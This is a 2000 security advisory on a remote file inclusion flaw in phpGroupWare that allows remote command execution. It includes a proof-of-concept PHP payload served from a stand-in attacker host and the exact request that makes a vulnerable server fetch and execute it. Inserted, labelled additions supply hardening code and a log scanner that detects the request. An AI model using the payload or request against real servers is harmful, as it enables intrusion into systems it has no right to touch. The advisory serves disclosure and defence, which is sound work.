
Title: Remote command execution vulnerabilities in phpGroupWare
Released by: Secure Reality
Date: 6th December 2000
=================================================

Secure Reality Pty Ltd. Security Advisory #6 (SRADV00006)

http://www.securereality.com.au

=================================================



[Title]

Remote command execution vulnerabilities in phpGroupWare



[Released]

6/11/2000



[Vulnerable]

Versions below 0.9.7 under Unix



[Overview]

phpGroupWare is a multi-user web based groupware suite written in PHP. phpGroupWare is quite popular due to its integration of many aspects of group cooperation: email, calendaring, file sharing, to do lists, etc.



phpGroupWare makes insecure calls to the include() function of PHP which can allow the inclusion of remote files, and thereby the execution of arbitrary commands on the remote web server with the permissions of the web server user, usually 'nobody'.



[Impact]

Remote command execution (with privileges as above)



[Detail]

This is an excellent example of another aspect of the remotely accessible include files issue that has been discussed in detail recently. The discussion has centered around the sensitive information that can be contained in include files and the fact that include files generally have the extension 'inc' and thus, if web accessible, are returned to the requestor in plain text.



A common solution amongst freely available PHP scripts is to give include files the extension .inc.php. This causes the include file to always be processed by the PHP interpreter and therefore not return sensitive configuration information, like database passwords, in plain text. Thus these programs can have easy installation (untar everything into the web space) without worrying about configuration disclosure.



The problem however then becomes one of context. Code and configuration variables in include files tend to be highly interdependent, that is, certain files and data must have already been included before including a particular file. By directly requesting the files we can break the interdependence chain and cause data the include files could normally trust to become untrustworthy.



Which leads us to the phpGroupWare vulnerability. We can directly request the library include files that make up the phpGroupWare API. One of these files, phpgw.inc.php, performs an include based on variables that should have been set as part of the call chain. By providing them ourselves we can determine the initial part of the following include statement:



        include($phpgw_info["server"]["include_root"] . "/phpgwapi/phpgw_info.inc.php");



By providing $phpgw_info[server][include_root] as a form variable that points to a remote web server on which we can place files, we can get the script to retrieve /phpgwapi/phpgw_info.inc.php from that server and execute it.
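The following is an added example, not code from the advisory or from the phpGroupWare project. It places the include pattern quoted above next to a hardened replacement that derives its include root from the file's own location, refuses to run when the library file is requested directly, and resolves the final path before including it. The marker constant PHPGW_API_INC, the temporary install layout and the sample paths are assumptions made for this demonstration.

```php
<?php
// Added example, not phpGroupWare's own code: the include pattern from the
// advisory next to a hardened replacement. PHPGW_API_INC and the temp-dir
// layout below are assumptions made for this demonstration.

// Vulnerable pattern. With register_globals on, the query string
//   phpgw.inc.php?phpgw_info[server][include_root]=http://evilhost.com/~shaun
// populates $phpgw_info before this runs, so the path is attacker-chosen and,
// with allow_url_fopen on, include() fetches it over HTTP and executes it.
function vulnerable_include_path($phpgw_info)
{
    return $phpgw_info["server"]["include_root"] . "/phpgwapi/phpgw_info.inc.php";
}

// Hardened replacement: the library refuses to run unless the trusted entry
// script set a marker, the include root never comes from request data, and
// the resolved path must be a real file under the install root.
function hardened_include_path($install_root, $relative)
{
    if (!defined('PHPGW_API_INC')) {
        throw new RuntimeException('library file requested directly');
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $relative)) {
        throw new RuntimeException('URL includes are not allowed');
    }
    $base = realpath($install_root);
    $path = realpath($install_root . '/' . $relative);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($path)) {
        throw new RuntimeException('include path is outside the install root');
    }
    return $path;
}

// Demonstration with a constructed install layout in a temporary directory.
$tmp = sys_get_temp_dir() . '/phpgw_demo_' . getmypid();
mkdir($tmp . '/phpgwapi', 0700, true);
file_put_contents($tmp . '/phpgwapi/phpgw_info.inc.php', "<?php\n");

$cases = array(
    'phpgwapi/phpgw_info.inc.php',   // legitimate
    'http://evilhost.com/~shaun',    // the advisory's remote include
    '../../etc/passwd',              // traversal out of the install root
);

// First call: marker not defined, as on a direct request to the library file.
try {
    hardened_include_path($tmp, $cases[0]);
} catch (RuntimeException $e) {
    echo "without marker -> rejected: " . $e->getMessage() . "\n";
}

// The entry script (index.php in a real install) defines the marker, and the
// library derives its root from its own location, never from request data.
define('PHPGW_API_INC', true);
$install_root = $tmp;  // in the real library: dirname(__FILE__) . '/..'
foreach ($cases as $c) {
    try {
        echo "$c -> " . hardened_include_path($install_root, $c) . "\n";
    } catch (RuntimeException $e) {
        echo "$c -> rejected: " . $e->getMessage() . "\n";
    }
}

// Deployment settings the attack depends on; each should read 'off'.
foreach (array('register_globals', 'allow_url_fopen', 'allow_url_include') as $d) {
    $v = ini_get($d);
    $on = ($v !== false && $v !== '' && $v !== '0' && strtolower($v) !== 'off');
    printf("%-18s %s\n", $d, $on ? 'ON  (weak)' : 'off (good)');
}

unlink($tmp . '/phpgwapi/phpgw_info.inc.php');
rmdir($tmp . '/phpgwapi');
rmdir($tmp);
```

Only the legitimate relative path is returned; the remote URL is refused before any filesystem access and the traversal case fails the install-root prefix check. The settings printed at the end are the ones the advisory's caveats depend on: with register_globals and allow_url_fopen both off (allow_url_include is the later, separate switch for include() itself), the request shape described here cannot reach a remote file even in unpatched code.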



For example, if I had access to place files in a webspace http://evilhost.com/~shaun/ I would create a directory "phpgwapi" and place inside it a script called phpgw_info.inc.php with content like the following:



<?php
        $phpcode = '
                echo("<pre>");
                passthru("id");
        ';

        // If we were called via remote include, send the code to be
        // executed
        if (substr($HTTP_SERVER_VARS["HTTP_USER_AGENT"], 0, 3) == "PHP")
                echo("<?php $phpcode ?>");
        else
        // Otherwise we're being executed on the target web server already,
        // so simply evaluate the code
                eval($phpcode);

        exit();
?>



(This script is designed so that the server it is placed on can be PHP enabled and not result in the code being executed on the attacking machine)



If we then make a request to the target machine like the following:



        /phpgroupware/inc/phpgwapi/phpgw.inc.php?phpgw_info[server][include_root]=http://evilhost.com/~shaun



The code should be retrieved and executed.
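A request of the shape shown above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the advisory, that scans Apache combined-format log lines for the three features of that request: a direct request to a .inc.php library file, a query parameter whose value is itself a URL, and an override of the include_root variable. The log lines are constructed for the demonstration and the classify_request function is this example's own.

```php
<?php
// Added example (not from the advisory): a small scanner for Apache
// combined-format access logs that flags the request shape used in the
// advisory. The log lines below are constructed for the demo.

$log_lines = array(
    '10.0.0.5 - - [06/Dec/2000:10:01:22 +1100] "GET /phpgroupware/index.php HTTP/1.0" 200 4120 "-" "Mozilla/4.7"',
    '10.0.0.9 - - [06/Dec/2000:10:02:03 +1100] "GET /phpgroupware/inc/phpgwapi/phpgw.inc.php?phpgw_info[server][include_root]=http://evilhost.com/~shaun HTTP/1.0" 200 512 "-" "Mozilla/4.7"',
    '10.0.0.9 - - [06/Dec/2000:10:02:10 +1100] "GET /phpgroupware/inc/phpgwapi/phpgw.inc.php?phpgw_info%5Bserver%5D%5Binclude_root%5D=http%3A%2F%2Fevilhost.com%2F~shaun HTTP/1.0" 200 512 "-" "Mozilla/4.7"',
    '10.0.0.7 - - [06/Dec/2000:10:03:00 +1100] "GET /phpgroupware/calendar/index.php?date=2000-12-06 HTTP/1.0" 200 9000 "-" "Mozilla/4.7"',
);

// Returns a list of reasons a request looks like a remote include attempt;
// an empty list means the line looks benign.
function classify_request($line)
{
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return array();
    }
    // Decode once so %5B / %3A%2F%2F obfuscation is seen in the clear.
    $url = urldecode($m[1]);
    $path = $url;
    $query = '';
    if (($q = strpos($url, '?')) !== false) {
        $path = substr($url, 0, $q);
        $query = substr($url, $q + 1);
    }

    $reasons = array();
    // Library files (.inc.php) are only ever meant to be include()d, never
    // requested by a browser.
    if (preg_match('/\.inc\.php$/i', $path)) {
        $reasons[] = 'direct request to include file';
    }
    // A query value that is itself a URL is the signature of a remote include.
    if (preg_match('#=\s*(?:https?|ftp)://#i', $query)) {
        $reasons[] = 'URL-valued parameter';
    }
    // The exact variable abused in the advisory.
    if (stripos($query, 'include_root') !== false) {
        $reasons[] = 'include_root override';
    }
    return $reasons;
}

foreach ($log_lines as $n => $line) {
    $r = classify_request($line);
    printf("line %d: %s\n", $n + 1, $r ? 'SUSPECT (' . implode(', ', $r) . ')' : 'ok');
}
```

Lines 2 and 3 are flagged on all three counts (the percent-encoded variant is caught because the request is decoded before matching); lines 1 and 4 are reported as ok. On a real server the first check alone is worth an alert, since no legitimate client ever requests an include file directly, and the same condition can be enforced up front by denying web access to the inc/ directory.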



It should be noted there are some caveats to this attack:
- The remote web server must be able to retrieve the file, i.e. no firewalls in the way
- The remote web server must not be running PHP under Windows since remote file includes are not supported on this platform
- The remote web server must be running a sufficiently recent version of PHP that [][] form variables are allowed
- The remote web server must not have allow_url_fopen set off
- Later versions of phpGroupWare check the variable $phpgw_info["server"]["header_version"] in phpgw.inc.php; for those versions we need to provide that via form variables too



There may well be others based on other versions/configurations of PHP.



[Fix]

Please upgrade to the latest version of phpGroupWare (0.9.7) at http://sourceforge.net/project/showfiles.php?group_id=7305



[Acknowledgements]

Our thanks to all of the developers of phpGroupWare, in particular Dan Kuykendall, for their assistance in quickly correcting this issue.



[Disclaimer]

Advice, directions and instructions on security vulnerabilities in this advisory do not constitute: an endorsement of illegal behavior; a guarantee that protection measures will work; an endorsement of any product or solution or recommendations on behalf of Secure Reality Pty Ltd. Content is provided as is and Secure Reality Pty Ltd does not accept responsibility for any damage or injury caused as a result of its use.

(C) 1999-2000 All rights reserved.